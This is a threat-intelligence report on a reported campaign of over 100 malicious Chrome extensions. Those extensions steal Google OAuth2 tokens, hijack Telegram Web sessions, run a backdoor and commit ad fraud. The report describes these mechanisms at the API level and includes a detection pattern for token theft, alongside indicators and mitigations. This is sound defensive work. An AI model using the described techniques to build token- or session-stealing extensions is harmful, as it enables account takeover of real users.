Full Report
More than 100 malicious extensions in the official Chrome Web Store are attempting to steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. [...]
Analysis Summary
# Tool/Technique: Malicious Google Chrome Extension Campaign (MaaS)
## Overview
A large-scale coordinated campaign involving over 100 malicious extensions published on the official Chrome Web Store. The extensions are designed to harvest sensitive user data, steal Google OAuth2 Bearer tokens, hijack Telegram sessions, and perform ad fraud. The operation is linked to a Russian Malware-as-a-Service (MaaS) provider utilizing centralized Command and Control (C2) infrastructure.
## Technical Details
- **Type:** Malware (Browser Extension / Infostealer / Backdoor)
- **Platform:** Cross-platform (Google Chrome Browser)
- **Capabilities:** Session hijacking, OAuth2 token theft, persistent backdoor access, ad injection, and identity harvesting.
- **First Seen:** Reported April 2026 (Socket discovery).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1176 - Browser Extensions
- **TA0003 - Persistence**
- T1176 - Browser Extensions
- **TA0006 - Credential Access**
- T1539 - Steal Web Session Cookie
- T1528 - Steal Application Access Token (OAuth2 Bearer Tokens)
- **TA0011 - Command and Control**
- T1071.001 - Web Protocols: Application Layer Protocol
- **TA0009 - Collection**
- T1539 - Steal Web Session Cookie (Telegram Web)
## Functionality
### Core Capabilities
- **OAuth2 Token Theft:** Uses the `chrome.identity.getAuthToken` API to siphon Google OAuth2 Bearer tokens, allowing access to the victim's Google account data without their password.
- **Identity Harvesting:** Collects personal information including email addresses, full names, profile pictures, and unique Google account IDs.
- **C2 Communication:** Communicates with subdomains hosted on a Contabo VPS for instruction fetching and data exfiltration.
### Advanced Features
- **Telegram Session Hijacking:** Monitors Telegram Web session data in `localStorage` every 15 seconds. It can overwrite a victim's local session with attacker-supplied data (`set_session_changed`), effectively swapping account access in real-time.
- **Execution Backdoor:** A hidden startup function that fetches and executes commands (such as opening arbitrary URLs) without user interaction.
- **UI Manipulation:** Injects attacker-controlled HTML via the `innerHTML` property to modify web content or facilitate phishing.
- **Ad Fraud and Proxying:** Strips security headers to inject malicious ads on YouTube and TikTok and proxies translation requests through malicious infrastructure.
## Indicators of Compromise
- **File Names:** Various extension names including "Telegram sidebar clients," "Keno games," "YouTube/TikTok enhancers," and "Text translation tools."
- **Network Indicators:**
- `contabo[.]com` (Infrastructure provider)
- Backend C2 hosted on Contabo VPS (Specific subdomains used for identity collection and session hijacking).
- **Behavioral Indicators:**
- Frequent polling of `localStorage` for Telegram Web data.
- Unexpected calls to `chrome.identity.getAuthToken`.
- Modification of security headers (e.g., CSP headers) on video platforms.
## Associated Threat Actors
- **Russian-aligned MaaS (Malware-as-a-Service):** Attributed based on code comments related to authentication and session theft mechanisms found by researchers.
## Detection Methods
- **Behavioral Detection:** Monitoring for browser extensions that frequently access `localStorage` for cross-origin domains or unexpected API calls to identity services.
- **Audit:** Regularly checking the `chrome://extensions/` page for unauthorized or suspicious publisher identities.
- **YARA-like scans:** Searching for the use of `innerHTML` injection patterns combined with `getAuthToken` within extension source files.
## Mitigation Strategies
- **Prevention:** Implement a "Highly Managed" extension policy using Chrome Enterprise, allowing only pre-approved extensions.
- **Hardening:** Disable the `chrome.identity` API for non-essential extensions via administrative policies.
- **User Education:** Train users to avoid third-party "Enhancer" or "Sidebar" utilities that request excessive permissions.
- **Incident Response:** If a compromise is suspected, revoke all active Google OAuth tokens and terminate all active Telegram sessions.
## Related Tools/Techniques
- **ChromeLoader:** Another prominent malware family utilizing malicious extensions for monetization.
- **Cookie/Session Theft:** Similar to techniques used by infostealers like RedLine or Vidar, but specialized for the browser ecosystem.